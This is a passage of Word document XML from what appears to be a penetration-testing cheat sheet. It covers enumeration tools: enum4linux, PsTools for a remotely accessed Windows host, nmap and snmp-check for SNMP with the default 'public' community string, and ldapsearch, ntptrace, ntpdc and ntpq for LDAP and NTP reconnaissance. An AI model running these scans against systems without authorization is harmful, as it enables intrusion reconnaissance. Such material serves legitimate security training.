          <w:p w14:paraId="7036245D" w14:textId="26B29E55" w:rsidR="009379D1" w:rsidRPr="009379D1" w:rsidRDefault="009379D1" w:rsidP="00BD4365">
            <w:r w:rsidRPr="009379D1">
              <w:t>Enum4linux starts enumerating and displays data such as Target Information, Workgroup/Domain, domain SID (security identifier), and the list of users, along with their respective RIDs (relative identifier)</w:t>
            </w:r>
            <w:r w:rsidR="007D5DD3">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D64CF0" w14:paraId="3009E94C" w14:textId="77777777" w:rsidTr="00252369">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4F0829D3" w14:textId="5546EAC2" w:rsidR="00D64CF0" w:rsidRDefault="00D64CF0" w:rsidP="00854B38">
            <w:r>
              <w:t>51.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="07396D9B" w14:textId="003D24B1" w:rsidR="00D64CF0" w:rsidRPr="009379D1" w:rsidRDefault="00D64CF0" w:rsidP="00854B38">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>PsTools</w:t>
            </w:r>
            <w:r w:rsidR="00F57EA9">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00F57EA9" w:rsidRPr="00F57EA9">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Only works in a Windows shell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="257C96FC" w14:textId="77777777" w:rsidR="00D64CF0" w:rsidRDefault="00D64CF0" w:rsidP="00BD4365">
            <w:r>
              <w:t xml:space="preserve">Once in a Windows machine remotely, check to see whether </w:t>
            </w:r>
            <w:r w:rsidR="00F57EA9">
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">PsTools </w:t>
            </w:r>
            <w:r w:rsidR="00F57EA9">
              <w:t xml:space="preserve">suite </w:t>
            </w:r>
            <w:r>
              <w:t>ha</w:t>
            </w:r>
            <w:r w:rsidR="00F57EA9">
              <w:t>s</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> been downloaded and installed to utilize on the command line interface.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A4687B4" w14:textId="77777777" w:rsidR="00F57EA9" w:rsidRDefault="00F57EA9" w:rsidP="00BD4365">
            <w:r>
              <w:t>Some of the most common PsTools are:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>psexec</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>psfile</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>psgetsid</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>pskill</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="412E80A4" w14:textId="10092617" w:rsidR="00F57EA9" w:rsidRPr="009379D1" w:rsidRDefault="00F57EA9" w:rsidP="00BD4365">
            <w:r>
              <w:tab/>
              <w:t>psinfo</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>pslist</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>psloggedon</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>psloglist</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>pspasswd</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>psshutdown</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00676F23" w14:paraId="41480578" w14:textId="77777777" w:rsidTr="00854B38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4E4DBFA8" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00854B38"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="17BE7111" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00854B38"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="00045546" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00854B38"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="506B0002" w14:textId="77777777" w:rsidR="003B00C1" w:rsidRDefault="003B00C1"/>
    <w:p w14:paraId="071B989B" w14:textId="77777777" w:rsidR="003B00C1" w:rsidRDefault="003B00C1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05343E90" w14:textId="46C03542" w:rsidR="003B00C1" w:rsidRDefault="003B00C1" w:rsidP="003B00C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>snmp-check</w:t>
      </w:r>
      <w:r w:rsidR="00860A91">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (snmp enumeration)</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3B00C1" w14:paraId="46CC97AD" w14:textId="77777777" w:rsidTr="000A77DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4050D6C8" w14:textId="69CE3654" w:rsidR="003B00C1" w:rsidRDefault="003B00C1" w:rsidP="000A77DA">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="784C8088" w14:textId="58B90AFB" w:rsidR="00D06B0F" w:rsidRPr="00936459" w:rsidRDefault="003B00C1" w:rsidP="00936459">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>snmp-check</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00D06B0F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>snmp-check</w:t>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is already installed on Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5CC0E037" w14:textId="77777777" w:rsidR="003B00C1" w:rsidRDefault="003B00C1" w:rsidP="000A77DA">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B00C1">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF SNMP IS ALLOWED ON THE TARGET, THEN TRY SNMP-CHECK, OTHERWISE SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7538035E" w14:textId="33CA1440" w:rsidR="00D50DA0" w:rsidRPr="00D50DA0" w:rsidRDefault="00B55D57" w:rsidP="00D50DA0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>First of all, check if the snmp service is open, usually found on port 161/udp. Nmap can be used to scout out this port:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B55D57">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55D57">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-sU -p </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55D57">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>161</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55D57">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00D06B0F">
              <w:t>Then, you can use snmp-check as such, this will use ‘public’ as the default string (pass):</w:t>
            </w:r>
            <w:r w:rsidR="00D06B0F">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00D06B0F">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D06B0F" w:rsidRPr="00D06B0F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>snmp-check</w:t>
            </w:r>
            <w:r w:rsidR="00936459">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00936459" w:rsidRPr="00936459">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r w:rsidR="00936459">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00936459" w:rsidRPr="00936459">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>161</w:t>
            </w:r>
            <w:r w:rsidR="00D06B0F" w:rsidRPr="00D06B0F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D06B0F" w:rsidRPr="00D06B0F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r w:rsidR="00D50DA0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00D50DA0">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D50DA0" w:rsidRPr="00D50DA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidR="00D50DA0" w:rsidRPr="00D50DA0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="00D50DA0">
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D50DA0">
              <w:tab/>
              <w:t>SNMP port (Default port is 161)</w:t>
            </w:r>
            <w:r w:rsidR="00D50DA0">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00D50DA0">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D50DA0" w:rsidRPr="00D50DA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-c </w:t>
            </w:r>
            <w:r w:rsidR="00D50DA0" w:rsidRPr="00D50DA0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
            <w:r w:rsidR="00D50DA0">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D50DA0">
              <w:tab/>
              <w:t>SNMP community (Default is public)</w:t>
            </w:r>
            <w:r w:rsidR="00D50DA0">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00D50DA0">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D50DA0" w:rsidRPr="00D50DA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-v </w:t>
            </w:r>
            <w:r w:rsidR="00D50DA0" w:rsidRPr="00D50DA0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="00D50DA0">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D50DA0">
              <w:tab/>
              <w:t>SNMP version (1,2c) (Default is 1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EC06AC3" w14:textId="1D90F24C" w:rsidR="0019029F" w:rsidRDefault="00D50DA0" w:rsidP="00D50DA0">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D50DA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Detect write access (separate action by enumeration)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D50DA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-d</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Disable TCP connections enumeration</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D50DA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-i</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Show script version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B00C1" w14:paraId="030D5984" w14:textId="77777777" w:rsidTr="000A77DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="31E3A3B6" w14:textId="77777777" w:rsidR="003B00C1" w:rsidRDefault="003B00C1" w:rsidP="000A77DA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="050C4B1F" w14:textId="77777777" w:rsidR="003B00C1" w:rsidRDefault="003B00C1" w:rsidP="000A77DA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43AA9B1C" w14:textId="77777777" w:rsidR="003B00C1" w:rsidRDefault="003B00C1" w:rsidP="000A77DA"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="299285CA" w14:textId="77777777" w:rsidR="00860A91" w:rsidRDefault="00860A91"/>
    <w:p w14:paraId="68FFEA1F" w14:textId="77777777" w:rsidR="00860A91" w:rsidRDefault="00860A91">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A25511F" w14:textId="0716EEE1" w:rsidR="00860A91" w:rsidRDefault="00860A91" w:rsidP="00860A91">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r w:rsidR="00CC375B" w:rsidRPr="00CC375B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ldapsearch | ntptrace | ntpdc | ntpq</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860A91" w14:paraId="61C8EE70" w14:textId="77777777" w:rsidTr="00CC375B">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34A60D72" w14:textId="5919D88D" w:rsidR="00860A91" w:rsidRDefault="00860A91" w:rsidP="000A77DA">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="607372D6" w14:textId="37CD55B5" w:rsidR="00CC375B" w:rsidRPr="00CC375B" w:rsidRDefault="00CC375B" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC375B">
              <w:t>ldapsearch</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B5E2D32" w14:textId="77777777" w:rsidR="00CC375B" w:rsidRDefault="00CC375B" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="615E9991" w14:textId="5EF863F7" w:rsidR="00860A91" w:rsidRPr="00936459" w:rsidRDefault="00BE43BF" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00CC375B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ldapsearch is installed on Kali by default</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="639EE520" w14:textId="7DCA04C9" w:rsidR="00860A91" w:rsidRDefault="00EC645A" w:rsidP="000A77DA">
            <w:r w:rsidRPr="00EC645A">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS ACCESS TO AN LDAP PORT, OTHERWISE SKIP.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00EC645A">
              <w:t>LDAP (Lightweight Directory Access Protocol) is an Internet protocol for accessing distributed directory services over a network. LDAP uses DNS (Domain Name System) for quick lookups and fast resolution of queries. A client starts an LDAP session by connecting to a DSA (Directory System Agent), typically on TCP port 389, and sends an operation request to the DSA, which then responds. BER (Basic Encoding Rules) is used to transmit information between the client and the server. One can anonymously query the LDAP service for sensitive information such as usernames, addresses, departmental details, and server names.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC375B" w14:paraId="207A13CC" w14:textId="77777777" w:rsidTr="00CC375B">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6CB1EAC7" w14:textId="355FD7FF" w:rsidR="00CC375B" w:rsidRDefault="00CC375B" w:rsidP="000A77DA">
            <w:r>
              <w:t>53.b</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0088D878" w14:textId="5CA9E20C" w:rsidR="00CC375B" w:rsidRPr="00CC375B" w:rsidRDefault="00CC375B" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ntptrace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1CE536F5" w14:textId="4417E068" w:rsidR="00CC375B" w:rsidRPr="00371A6E" w:rsidRDefault="00CC375B" w:rsidP="000A77DA">
            <w:r w:rsidRPr="00371A6E">
              <w:t>To trace a chain of NTP servers back to the primary source, use:</w:t>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ntptrace</w:t>
            </w:r>
            <w:r w:rsidR="008148E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="008148E8">
              <w:t>This command determines where the NTP server obtains the time from and follows the chain of NTP servers back it its primary time source. Attackers use this command to trace the list of NTP servers connected to the network.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC375B" w14:paraId="7C386359" w14:textId="77777777" w:rsidTr="00CC375B">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27B496AA" w14:textId="55652095" w:rsidR="00CC375B" w:rsidRDefault="00CC375B" w:rsidP="000A77DA">
            <w:r>
              <w:t>53.c</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5604BF8A" w14:textId="567E24B1" w:rsidR="00CC375B" w:rsidRDefault="00CC375B" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ntpdc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F34EB6D" w14:textId="5CC6979B" w:rsidR="00CC375B" w:rsidRPr="00371A6E" w:rsidRDefault="00CC375B" w:rsidP="000A77DA">
            <w:r w:rsidRPr="00371A6E">
              <w:t>To monitor operation of the NTP daemon, ntpd, use:</w:t>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ntpdc</w:t>
            </w:r>
            <w:r w:rsidR="008148E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008148E8" w:rsidRPr="008148E8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
            <w:r w:rsidR="008148E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="008148E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008148E8" w:rsidRPr="008148E8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
            <w:r w:rsidR="008148E8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008148E8" w:rsidRPr="008148E8">
              <w:t>List peers known to the server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC375B" w14:paraId="56B948B7" w14:textId="77777777" w:rsidTr="00CC375B">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5CD254DA" w14:textId="0E421D10" w:rsidR="00CC375B" w:rsidRDefault="00CC375B" w:rsidP="000A77DA">
            <w:r>
              <w:t>53.d</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0C0E1BB2" w14:textId="05C8B15C" w:rsidR="00CC375B" w:rsidRDefault="00CC375B" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ntpq</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
